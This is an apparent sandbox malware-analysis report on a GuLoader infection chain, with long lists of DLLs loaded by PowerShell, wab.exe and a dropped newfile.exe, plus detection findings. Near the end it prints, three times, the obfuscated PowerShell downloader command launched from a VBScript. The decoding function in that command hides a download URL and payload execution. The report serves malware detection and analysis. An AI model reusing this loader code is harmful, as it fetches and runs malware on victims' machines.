Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: iertutil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: newfile.exe

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: POWERSHELL "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatini", "0")

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.2603283847.000000000CA31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3346276290.0000000007441000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Storhertug $buningens $Ideologic), (Hensattes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Paddy = [AppDomain]::CurrentDomain.GetAssemblies()$global:Cla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Paramastitis)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kidders21, $false).DefineType($Hidfrtes, $Sl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv 